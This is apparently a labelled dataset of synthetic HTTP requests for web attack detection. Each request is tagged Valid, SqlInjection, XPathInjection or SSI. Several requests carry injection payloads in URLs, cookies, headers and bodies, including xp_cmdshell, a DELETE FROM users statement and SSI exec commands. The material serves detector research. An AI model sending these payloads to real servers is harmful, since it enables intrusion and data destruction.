GET /ld7bii/k@/iblmrte/einn8/jhBsxmlvOJGto8O/hlptrpa/hH.php4?TeelApleetossl=+fi&tmlrho=lOb7fr&meshm=t&attfrIi4Nn=+%3Am&eAnobn3w=iKi HTTP/1.1
Host: 218.202.147.47
Connection: close
Accept: text/*, video/quicktime, audio/*
Accept-Charset: iso-8859-8, iso-8859-6, iso-8859-1;q=0.1, euc-kr;q=0.6, hz-gb-2312;q=0.7
Accept-Encoding: 
Accept-Language: A-eqnw, dhrn-et8, b-a
Cache-Control: max-age=09
Client-ip: 230.11.255.176
Cookie: suMd2dip=OmIxnctutrmiieu;tiHwmicclte=lTctmaiu;reloeshsa2Au=b67d;aamsTemeC=eiei;wnae5eeode=zkzUp6iwGZ;0ihadmderiau=zhtacceso?527am
Cookie2: $Version="61"
Date: Sun, 14 Feb 10 20:42:46 GMT
ETag: "kanm-t42aPExAOvvTB"
Expect: hveiafgs
From: dzpsof6@gehphe0eb.biz
If-Modified-Since: Sat, 28 Feb 04 07:38:36 GMT
If-Unmodified-Since: Sun, 06 Apr 08 12:13:34 CET
If-Match: "eTWSGWXbJR2eGH-dJJ"
If-None-Match: *
If-Range: Sat, 10 Oct 09 14:28:38 UTC
Max-Forwards: 946
MIME-Version: 2.5
Pragma: a='DeNtewo'
Proxy-Authorization: aTdehi 0e7oeOa=tiiawxne
Authorization: NTLM alVsblN5bXRkcmVvbXJlZmVuSXV1YWloZW90dXF0ZWJjaWRkbmNo
Range: 840-5520
Referer: http://EynbtE7n.net/i58Alu/heuye4ip/2nxqn.jsp
TE: trailers,gzip,chunked;q=0.1
Trailer: Host
User-Agent: tmMMG_r7OT http://www.nSbrela0.org
UA-CPU: PowerPC
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: 6.8 www.b75l.html, HTTP/1.5 www.n8yuunE2.gif
Transfer-Encoding: weNi
Upgrade: ty9fte/7.4, hoCnM/8.7
Warning: 228 www.bfenm.gif "bhintfrpnveP" "Sun, 06 Aug 06 02:21:34 GMT"
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 14459
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30761
Start - Id: 19827
class: Valid
GET /bUUP/2yd@H7/ovHAFM.Cb/n3775IXqVO/5KAwD60lphp.jpeg?Wm.mxstdinXcm=obgsoundbody&z6_SGw=922&b6a=aNWzSIup-a&i4edLimoseoso=ib%24%3E&ta5ksreadneixu=tdocumente%29me8+&ofqlea9b=zisl7v8T&aeibec8un=60959&ixx0Iy10erlsaS=+t%3BNeawphp%5Dgtsn%28e&srt3oupEazd=9esisw&rnAIdsc=20132830&nxycfaDtawn=713185&8WKsw1Ca_=woe3TeofstzRTakt&eip4E=ezebkh7lPt&an95jfrIt=qe HTTP/1.1
Host: www.tase.biz
Connection: sd7nL
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesetrad, windows-1258, x-mac-japanese;q=0.6, us-ascii, koi8
Accept-Encoding: compress, gzip;q=0.3
Accept-Language: h5HdReid-eGeac3eo;q=0.6
Cache-Control: a=uhhat83
Client-ip: 38.40.186.231
Cookie: hie7nuv7d=essegmnIi;8ntr=doYoscm5of;h2Ari2cn=rtinsert82Ojates;8P9=wne~hlea7pieoty;iLJTD-i=882;te5ahtjazorHsd=m0OsTgSil
Cookie2: $Version="5"
Date: Sat, 26 Mar 05 06:49:55 GMT
ETag: "aDdq8x1dUjJI@O4Z3Utg"
Expect: 100-continue
From: 3ipnnnqa@edukeeehui.net
If-Modified-Since: Wed, 02 Sep 09 24:10:45 UTC
If-Unmodified-Since: Mon, 05 Dec 05 15:38:33 GMT
If-Match: "JRVN9ii_l@PUH4jhmvS"
If-None-Match: "ljceu-iywpcTAFScm"
If-Range: Sat, 01 May 10 18:56:54 CET
Max-Forwards: 967
MIME-Version: 8.0
Pragma: tenael='glE'
Proxy-Authorization: epite dr8I=uCpxe
Authorization: Digest cnonce="ToeyewS"
Range: 31-27672,31-,92-
Referer: http://www.mfniaf.be/srawtmt1/rannnuir/YAwqt/haitu.mpeg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/1.5 (compatible; Konqueror/1.6; SunOS sun4u; miimuid)
UA-CPU: StrongARM
UA-Disp: 606,8028,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4605x2627
Via: FTP/6.5 www.naobUi.gif:2270, HTTP/8.9 87.165.159.205, 0.1 3.235.24.109:98
Transfer-Encoding: gzip
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19827
Start - Id: 35475
class: XPathInjection
GET /evtqdIa6/Qzq@/mvDxu2BC0Vw/dxRw0F@WuO/ifAqmUGuzFwUG1fA_k/tobject2cbWZwhS2BAwQ/mXM/aJPmGIevSepm/eE@ofo4j/rukyvEIKEb-SMxFvI.tiff?OMwJbN=6anreserviceswoon&mv=bNheortyic+T7t%3B&hsflnsaaee1=olfit&teu=2&etwkiyewVu=t7oCYjn HTTP/1.1
Host: www.maeh0auvui.de
Connection: close
Accept: */*
Accept-Charset: iso-8859-7;q=0.3, windows-1255
Accept-Encoding: *;q=0.5
Accept-Language: 2nIvk4nR-eme0c;q=0.9, leuKhabr-hXe;q=0.6, um-6rho;q=0.5
Cache-Control: no-store
Client-ip: 59.239.90.47
Cookie: tWoghfulits=gohzm2TA5
Cookie2: $Version="42"
Date: Tue, 25 Jul 06 15:07:13 UTC
ETag: W/"8kE08l2MEJ9HkO6"
Expect: 100-continue
From: djepela@Ereu.st
If-Modified-Since: Wed, 08 Aug 07 02:04:51 CET
If-Unmodified-Since: Sun, 18 Apr 04 13:55:04 GMT
If-Match: *
If-None-Match: ".dgSZX4FqE7N2XCKf"
If-Range: "UqLtyWee9A0mveZ"
Max-Forwards: 3790
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: aisd RhjLhrht=aojbCnu
Authorization: NTLM ejFubWVlZWNyNm5sOGVoN3NmZXJmbnBlY1NvNXFpcmZjZXl1ZWhu
Range: 527-,12-81
Referer: /33G0icye/mntm7se7/ord3e/kolinal/ldo36iat.gif
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: asxr'     or    path/child::node()[position()=N]  or  'mgtfie' ='
UA-CPU: x86
UA-Disp: 1801,706,8
UA-Color: color8
Via: FTP/3.9 www.whsiis.png:4331
Transfer-Encoding: nhhqnE; smEhr=6Bhpnnvc
Warning: 084 www.rse4aa.htm "nhtTetlnisasnnesic" "Thu, 10 May 07 21:23:05 UTC"
X-Forwarded-For: 140.122.154.142

null

End - Id: 35475
Start - Id: 41065
class: SqlInjection
GET /pf5a5in81ooD6Per.jpg?tF5=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&ea=hsA2soi7gddre&Eahaeo=au&h6vjVqsqiyut9=0117811&7winntNzEwget-hexecvar5X=5487036 HTTP/1.1
Host: www.tInseipqto.net:61547
Connection: close
Accept: text/*, image/gif, audio/basic;q=0.7
Accept-Charset: iso-8859-4;q=0.4, iso-10646-ucs-2, iso-8859-6, iso-8859-9, windows-1255;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 29.8.160.212
Cookie: uqnfoAE0ooq=36979861;2p=8echoe5s\ae
Cookie2: $Version="049"
Date: Sat, 14 Jul 07 15:11:08 UTC
ETag: "x.hbUQbHgkte8ldBa7p"
Expect: ttrhbztf
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Wed, 20 Apr 05 01:08:12 CET
If-Unmodified-Since: Tue, 20 Nov 07 24:58:29 GMT
If-Match: "zndjQbm6CAuv2DpY8"
If-None-Match: *
If-Range: Sat, 30 Jan 10 04:23:04 CET
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Digest algorithm=MD5
Range: 7-04,570-
Referer: /mteC2e/endo/aeodih/oEschcR/sitrha.php
TE: trailers,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/8.2 (compatible; Konqueror/2.3; Mac OS X; spep; ktnrnerzk; esandt)
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7677x541
Via: itt/8.0 www.efemmhE.htm
Transfer-Encoding: deflate
Upgrade: uohtr/6.5, oeo/0.4
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41065
Start - Id: 35462
class: SqlInjection
PUT /zIlshrwrtNo/cehjdNeeezientwiut/yVKn4YUVpasswd9/_4logevalxSWmboot.ini/oi0qgqjF3H7DYStCWU/e@4Xi.2sh/5exoi6uZvDX/mEetyomtjvEls.html? HTTP/1.0
Content-Length: 76
Content-Language: saeho8n
Content-Encoding: deflate
Content-Location: /r0cebm.msf
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Aug 04 04:57:45 GMT
Last-Modified: Tue, 27 Nov 07 11:38:55 UTC
Host: 75.98.27.108
Connection: ekpTLeb
Accept: text/*;q=0.2
Accept-Charset: euc-jp;q=0.2, gb2312, koi8-r
Accept-Encoding: 
Cache-Control: only-if-cached
Client-ip: 169.5.60.151
Cookie: fono=or    0<>(select   count(*)   from     veef)
Date: Fri, 27 Jun 08 04:42:34 UTC
If-None-Match: "F_jR@6D8lvYnam@ylnO"
Max-Forwards: 7
Pragma: no-cache
Proxy-Authorization: Basic QXQzYWhkYTpmbk50U3lu
Authorization: ysgu eSbtde=itdlitu
Referer: http://rn6sre.net/14wRtn5g/ninocw9/mrsidl2b/lrcGC/ot1aslp.gif
User-Agent: oQJK2k6Fxp http://www.a6c2waae.uk
Transfer-Encoding: identity
----: -------------------------------

yriogensnu==PlosRtn&rsjrgognurn=346&tryo88mne=inefnrot-nc(&1pcE=e>znoh

End - Id: 35462
Start - Id: 24944
class: Valid
GET /esr1isTaayicdc/7imttpsbsrento/4l4/hNenhfudznadEeue.htm?artaLo=987847326&IpQSxsy2caccept=eetEcn%7CC+geo5ontptscripti&ihqeqetwd=6 HTTP/1.1
Host: 128.126.16.1
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: o-ELctyr;q=0.0, Rgrh-daeoso;q=0.1
Cache-Control: no-cache
Client-ip: 126.24.224.246
Cookie: Vtoui2ls=dmfe~da;ekccxtpso=l1ad)
Cookie2: $Version="95"
Date: Thu, 12 Feb 04 03:16:24 GMT
ETag: "eL19A_153YDUOBz"
Expect: de4t
From: iefmllR@anati.de
If-Modified-Since: Mon, 21 Apr 08 21:52:18 CET
If-Unmodified-Since: Wed, 31 Aug 05 15:45:56 UTC
If-Match: "Rrqz9cXrZEZyV63N1"
If-None-Match: *
If-Range: *
Max-Forwards: 56
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM ZXp1c2NlbjFlYWhhaWhwTml4OXRtb2VvQ2VoamhKdDZEZWhGY21MbnRlbUNl
Authorization: Digest nonce
Range: -47448,86125-296,-084
Referer: /arserf/m4at/vc3et.swf
TE: trailers,deflate;q=0.9
Trailer: If-Range
User-Agent: Mozilla/2.8 (compatible; MSIE 8.9; Windows NT; ozbmug; tnit; ei2cj)
UA-CPU: Sparc
UA-Disp: 899,4850,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: coaszs/6.5 29.242.20.72, 7.2 53.84.170.216, 8.7 www.gi9eqb.png
Transfer-Encoding: slwusg; DoDt=mslzovfu
Upgrade: ttaild/2.4, veere/8.1, dntrep/1.5, eseTr/3.4, ieS/1.5
Warning: 423 89.183.100.167:0470 "eepcy4ogcNtmpn1e36sn" 
X-Forwarded-For: 38.96.136.60
X-Serial-Number: 2466804840974150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24944
Start - Id: 19558
class: Valid
GET /rOEzOdmx.@DP./rN0t-IUZeh/wg0tdMCe/tamcneuw/senhygtiL/Oa5nbt9stOR/hheie/wlkhRta/VaVWl4tTJK/teW-nf-g3PEdql.gif?js=erH%27p+stob7s&Ewtep3cdesdtoE=SsHnmsp&SP6where=tzEh&i9bnvdoeefmha=bZVpfieVZa4&Z0shutdownDNoO-=+hfrom+&toS=e94uQ-&lFktIshi=mbyoIteas3i0taxe&spqroLtiNint=843464 HTTP/1.0
Host: www.asanendf.st:14855
Connection: enftN
Accept: */*;q=0.8
Accept-Charset: iso-8859-6
Accept-Encoding: 
Accept-Language: innmat7-sAt
Cache-Control: only-if-cached
Client-ip: 158.64.174.242
Cookie: vs=Sl
Cookie2: $Version="0"
Date: Tue, 01 Mar 05 10:34:17 UTC
ETag: W/"3WZi10qeyblryt3aQ"
Expect: emeCt
From: ogeen@6fmx.ch
If-Modified-Since: Thu, 20 Sep 07 06:09:31 GMT
If-Unmodified-Since: Fri, 30 Jun 06 04:56:39 UTC
If-Match: "Bcycf8LOfSFW.MKg"
If-None-Match: "vkm5QlLRIxSOfUS"
If-Range: "5tbzeARibE4sTEQFSXL5"
Max-Forwards: 91
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Houyig La3tes=eueu9ake
Authorization: NTLM ZWphZWNvZXR2ZXJlbzNVc2JoaHVpbDBlYWFPdGl5ZHlzNHFv
Range: 156-,0-
Referer: /ileei8ca/ra3laas/ayEJier.js
TE: gzip,gzip;q=0.9,trailers
Trailer: Date
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 9.8; x8-9o; rv:0.2.1) Gecko/13248573
UA-CPU: MIPS
UA-Disp: 3027,9526,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 690x0416
Via: 2.1 246.214.176.226, FTP/2.6 www.nnRau.html, FTP/4.7 178.153.110.117
Transfer-Encoding: identity
Upgrade: blY3i/9.6
Warning: 221 109.194.95.186 "HadeswhpiEhpvsciaeMe" "Fri, 15 Jun 07 14:31:49 UTC"
X-Forwarded-For: 194.75.244.233
X-Serial-Number: 49554913
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19558
Start - Id: 41280
class: SqlInjection
GET /rbt-lYM0wmO59FCTSYp/ethre/aTbvUYppSPa/e6ph/sncrjB4ennwnui/8GtKZcopyMHON/mdhQNeou9eiaha/rZJimgcalZ/6QE@alllFFHd1CRVL/1ncziframe7jyIdivadmin.gif?4ee5=72&0eetab=ts7h+to+toPphttpdemMhg&htaccesTXZasautoexec@=u3a%26hrTgr&epledcneYz=2GlywXhmsLZ&Q4_2Ll=n7nwMrgsfooce HTTP/1.1
Host: www.pol2.be
Connection: close
Accept: */*
Accept-Charset: windows-1253
Accept-Encoding: *;q=0.9
Accept-Language: 8-ph
Cache-Control: max-stale=057
Client-ip: 170.240.213.203
Cookie: trssnel2d8=zs+e;rc=OrigText'OR'tC738eou' =  'doilaiw';owqieowtsN=ie4ltNdoae8gta;qWYs=72
Cookie2: $Version="7"
Date: Fri, 30 Apr 10 02:01:30 CET
ETag: "RwUFwv_47PNnyMM"
Expect: ghse4=irnn;asNw3eo
From: elRhz@z5H6d.it
If-Modified-Since: Sun, 01 Jul 07 11:48:04 CET
If-Unmodified-Since: Fri, 16 Jul 04 02:53:54 CET
If-Match: "hs2T-FimYXdW0EZVI"
If-None-Match: *
If-Range: "44fZmDS5VELLVR5uMCI"
Max-Forwards: 693
MIME-Version: 9.5
Pragma: 6s1Z=i3rjsNl
Proxy-Authorization: deoa hlT7nho7=cepy
Authorization: NTLM djBlcG5oNmFkbnRFRXA5dGhuY2h3bWVkd3RocWhkbWVlOHlobHVzamFuM2VveA==
Range: 9564-
Referer: http://5vws.com/btie/iybru/iecanae/7eeonman.pl
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/9.9 (compatible; slce; Open BSD i386; etrt; rI79e; aimewep)
UA-CPU: StrongARM
UA-Disp: 6178,926,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1296x4154
Via: 9.6 www.5nseruo.png, 1.8 www.eamtr.html
Transfer-Encoding: identity
Upgrade: yEe/8.1, maee/7.8, t0msf/7.4
Warning: 904 132.169.173.178 "wtas" "Sat, 07 Mar 09 23:37:50 UTC"
X-Forwarded-For: 7.111.55.106
X-Serial-Number: 891769847073825
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41280
Start - Id: 40184
class: SSI
GET /B@09BVyh_s_9i/rzGAQyMwqiEJ2iF2E/osthlrlreazjDEuTA5lc/vwPsMhSFuU0eOm-W/uscuobcdde/4uT/e5Z-PekO/seErsgfaal/yr/sIZLu@bsIcE3JFt/Nd/d4i5e0aRald.html?ieie=092&fs7=654&CfbxHdKvtelnet=cneo1jaaeahmtohx3l&RupdateiW=pc8&syIsne=cgyc&q7lthmemieisIs=8622081182&abh=uhx%28&mWqupdatedrop_1=eiframe4l&fsevovitwxui6iE=%3C%21++++%23%3C%21--%23exec++++cmd%3D%22id%22--%3E&e3rnncers=375646011&C-insertKBUdwSOba=iox5pcxrenMtr HTTP/1.0
Host: www.ofht.com:546
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, windows-1252, shift_jis;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 113.54.199.202
Cookie: whisteoaj=53528;fXqhKWu99NR=sto
Cookie2: $Version="405"
Date: Thu, 01 Jan 09 22:57:57 UTC
ETag: "nsJIJ8dwE41Z_@egNq"
Expect: 100-continue
From: woeiond@etiwPn.it
If-Modified-Since: Fri, 30 May 08 16:52:15 UTC
If-Unmodified-Since: Sat, 28 Jun 08 21:21:16 CET
If-Match: *
If-None-Match: "E_yQGn3cE93KGQyAV"
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 7451
Pragma: ej1hicts='in'
Proxy-Authorization: Digest username="UloTorac"
Authorization: Digest nc=ac4Fa0bE
Range: 95170-36663
Referer: http://www.iEa47ha.org/tt5eE/fihflve/isedry.css
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.5 (Windows; U; WinNT 6.9; 0e-ad; rv:7.0.2) Gecko/40642838
UA-CPU: 68000
UA-OS: Mac OS X
Transfer-Encoding: gzip
Upgrade: adn/7.5
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40184
Start - Id: 41799
class: SqlInjection
GET /hndan3/loansiaaxlhe8tenepe/KJI/isgiy/catNuasEpnoihsRecg/testoad7bntb/xJ2Ag8N6/d8Z1emwWoIg/Nwindow.openVRtmpTOpassthrutQ/atmktesgyaqrgleaire/fevOeEsa54scah1l.html?gwi9ufmiwf=3448970&F3pKcB=4985&etgorlrRea6ao=OR+++++896819089%3D896819089 HTTP/1.0
Host: 70.91.171.114
Connection: eond
Accept: application/postscript;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: o5e-by8bssi2, mdbntot-3o1rahum, haS-0spfox, 0ouonhPN-oeaJhe, ia1heo8-r;q=0.3
Cache-Control: max-stale=10
Client-ip: 218.44.126.244
Cookie: svaNelkeht=er;nltchk5wrlhh=h;iusb6=ehcidOtn oqs;hi=0;Z8cuw.ercpdocumenthavingEF=9psgOeskns;rxtei=hUp.nJ2-Be
Cookie2: $Version="874"
Date: Wed, 07 Apr 04 21:38:39 CET
ETag: W/"u-p0upc_i-I_o6YnCF5"
Expect: ytnux=thiRx
From: ame9p@neehptrbo.fr
If-Modified-Since: Sat, 01 Sep 07 10:06:13 CET
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: "77e92Z0oWxPyN5gW"
If-Range: Mon, 11 Aug 08 07:31:05 UTC
Max-Forwards: 5
MIME-Version: 8.5
Pragma: tmge=bSuNI
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: osyatE g2aorS=yuuca
Range: 82059-
Referer: /aecih/njadmO/e9stlt.php4
TE: gzip,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/6.1 (X11; U; Open BSD i586 8.7; 2p-r0; rv:5.6.0) Gecko/30035448
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7179x1026
Via: nhe/7.9 www.fjmt.tiff, HTTP/5.0 9.97.131.191
Transfer-Encoding: gzip
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 864 www.eeeoa.css "hlrre9anouesreagre4w" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 12063263563674128535
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41799
Start - Id: 3028
class: Valid
GET /8m80KzG.jpeg? HTTP/1.0
Host: 76.213.149.169
Connection: iout
Accept: image/png, video/*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: 2eee0t-S;q=0.0, 0xM-4arhl;q=0.7
Cache-Control: no-store
Client-ip: 173.156.21.30
Cookie: zeNc=[nua
Cookie2: $Version="42"
Date: Wed, 23 Mar 05 03:54:54 UTC
ETag: "qUHkNbL-yPO3IxUA"
Expect: 100-continue
From: vnsept@amber3mas.com
If-Modified-Since: Fri, 19 Dec 08 03:00:24 UTC
If-Unmodified-Since: Sat, 08 Apr 06 17:15:49 GMT
If-Match: *
If-None-Match: "EYXxnozAoyIJDrynIUv"
If-Range: Fri, 04 Aug 06 23:52:14 GMT
Max-Forwards: 6
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: aAxi3n wp7nsimi=binuofe
Authorization: NTLM UGV0YXRtV091T2hPYW9zaGxhVWg5ZXJ0dHRlNWhub2k1ZWhKbGpldA==
Range: 37991-,-13
Referer: http://oDf5oWd.net/uaHttos/dcpto/vmiehm/ixoz.tiff
TE: trailers
Trailer: Warning
User-Agent: Mozilla/5.8 (Windows; U; Win 9x 3.3; gn-et; rv:4.7.2) Gecko/47899256
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 118x5064
Via: 0.2 www.aiosi.jpg:3, HTTP/5.6 194.188.129.104, 9.9 196.76.81.207
Transfer-Encoding: deflate
Upgrade: eyshdo/6.5, d0a/4.9, trpole/3.1, 9iyrb/0.5, o2zegv/7.8
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 214.228.126.215
X-Serial-Number: 2317803874
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3028
Start - Id: 39917
class: SSI
PUT /rYoc4K_m5Bw/4s-TEc@YTSR60QVRrF0w/fqP7KPPx/etI3uenrtokis/kwgny0escotunctmi/if/nqnPti/oPrpCbsWiksanP6eZ/MdIWqwp-bfsT7.asp? HTTP/1.1
Content-Length: 206
Content-Language: grM,ntben0ca
Content-Encoding: compress
Content-Location: http://w2U4h.fr/NoieqnEu/suec/wtdsi4r/trl4tu/idretmwr.php
Content-MD5: Y21ocnRvenRybjVpczg1aA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Feb 05 09:33:55 UTC
Last-Modified: Thu, 05 Nov 09 11:57:16 GMT
Host: 235.231.94.91
Connection: u7dh
Accept: video/*;q=0.9
Accept-Charset: iso-8859-15, windows-1258;q=0.6, iso-8859-5, cp-950;q=0.0, x-mac-turkish;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 239.36.31.16
Cookie: wiasorbreopueet=3
Cookie2: $Version="86"
Date: Mon, 18 Apr 05 24:45:19 GMT
ETag: "oFCCtwKdqig7svS9H"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Nov 08 24:46:35 UTC
If-Unmodified-Since: Sun, 05 Feb 06 04:13:50 UTC
If-Match: *
If-None-Match: "yEvVKlSQTUz1rYVA1Y"
If-Range: "oxjrdhUt60ijnMht"
Max-Forwards: 77
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: http://ldab.ch/tttiexif/zeobKr/dsnh/e4adzihr/YgobLhia.mdb
TE: trailers
Trailer: Trailer
User-Agent: eDyj (lx9vmPiO5; e7w2fIwy@l; r8Ioyd)
UA-CPU: StrongARM
UA-OS: Win9x
UA-Color: color16
Via: 0.8 193.69.194.244
Transfer-Encoding: areae; hi6ivrg=otTAo5e
Upgrade: enw/1.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

snrnmu2iiifjE=<!--     #exec cmd="/bin/ls   -l    /home/lwol6lerhe/rtnzsr" -->&Z5_hBQv=setpss-snsmcic&q0=920&1..T=meoeeA7init &ivyedem77dSI7Dt=deEd&nnU=1t&AMC=oap&nob7dnner3te=lm4fZB

End - Id: 39917
Start - Id: 7395
class: Valid
PUT /habfenliltbhtietas/fxfjY/ah6l67h@WU2Sm2cPGh/psi1e0a1kNstt7nEstip/connecteOG7l_W/doaisthalfocuhsmc/ej7GAQDP8/kHG0AFXQ/rbhqs.jpeg? HTTP/1.1
Content-Length: 206
Content-Language: rHZei
Content-Encoding: deflate
Content-Location: /plnOh.dll
Content-MD5: bGlldG50YXNzdmJlMXdhYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 10 12:59:01 GMT
Last-Modified: Sun, 13 Jun 04 09:46:50 CET
Host: www.iDnaoatsO.uk
Connection: slf0zl
Accept: */*
Accept-Charset: iso-8859-1;q=0.8, x-mac-japanese;q=0.8, euc-kr;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 46.91.60.175
Cookie: 07ltw57dort=iapeesws6j;raen=1017875
Cookie2: $Version="34"
Date: Tue, 30 Nov 04 19:22:40 GMT
ETag: W/"3AxRsEszWGY9.fC"
Expect: 100-continue
From: p4dremdP@srvk.ch
If-Modified-Since: Sat, 10 Nov 07 05:11:01 GMT
If-Unmodified-Since: Wed, 07 Nov 07 23:33:57 CET
If-Match: "DmIQrXBj8b@I@Zr"
If-None-Match: *
If-Range: "Kd7nUxAeOvYTQacG49q"
Max-Forwards: 0046
MIME-Version: 0.7
Pragma: earneo0='8soz'
Proxy-Authorization: NTLM Z3RkMmNwMFRFMXdwdHR0bnNlZHRucmZuNW5lbXRlNlNlaW5lS2Vo
Authorization: ehAnO adInrad=btRtjpO
Range: 12-25753
Referer: http://ioEogbru.net/ydTchrlb/r1Enaanh/auizata/oil2tiu/Cncn.cfm
TE: chunked;q=0.2
Trailer: Proxy-Authorization
User-Agent: 3pirelawO (sJ6QmJDt)
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 850x401
Via: t4r/5.4 49.246.28.139, 3.9 255.249.211.195
Transfer-Encoding: identity
Upgrade: arsv/7.3, gzM/6.6, neme/1.8, raLOwa/5.7
Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 667759757247611
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dzr=rrh&ttaO=uuvXGE0nCgAh&nullpIG@1AFez6r=204y&Fosntind7dceoh=moT&Ste=&[+jmwindow.openk)randu'a ap&4noOseA=t.Z8y5Uoenj&o2aM=t&ecei=1814&-NPCa=rrrweeetc+9THa+ta&wes9hdwdFn=htelnetgphpeirconnect

End - Id: 7395
Start - Id: 42217
class: SqlInjection
GET /jtry42rtx3m7neathw/_QscriptXimgcmd7D.M_/i4wunmhtreAeudId.cfm?1rhoreheeetpltf=sHr3eva0&GsncneTil=s75wfh&D.@dwA9xterm7W=nAmrinsertsnoutmpo8&ilxdhdr=eDGbwrR_5UZ_&Ftmagndls=moarrcg%27++%29%3BDELETEFROMusersWHEREupper%28username%29++%3Dupper%28++%27admin&x1u0e=59&mehx0met=825947&hN=5&jiq3it6edsc=%5Bmi%7Ctawgetoxtermetc&mn9ncmnmrn=32&cdhui=s9hsovt HTTP/1.0
Host: 229.26.233.140
Connection: 8drn
Accept: application/postscript, text/*
Accept-Charset: x-mac-hebrew;q=0.7, euc-jp;q=0.4, euc-cn, big5;q=0.6, iso-2022-kr;q=0.6
Accept-Encoding: 
Accept-Language: at57d-eresoe
Cache-Control: Eo9x='k'
Client-ip: 184.140.210.188
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="069"
Date: Thu, 13 Dec 07 21:40:57 UTC
ETag: "qu.jZl22SCIG3R.JF"
Expect: cttahr1o
From: 6bttom@2kOpyg.org
If-Modified-Since: Sat, 05 Sep 09 08:14:04 GMT
If-Unmodified-Since: Wed, 24 Aug 05 23:43:17 UTC
If-Match: "oeWmBKmYF6Sq1VNuZW"
If-None-Match: *
If-Range: "R3Y3Nvun6IzWFuN002"
Max-Forwards: 5867
MIME-Version: 0.3
Pragma: ehtaEy='eposea'
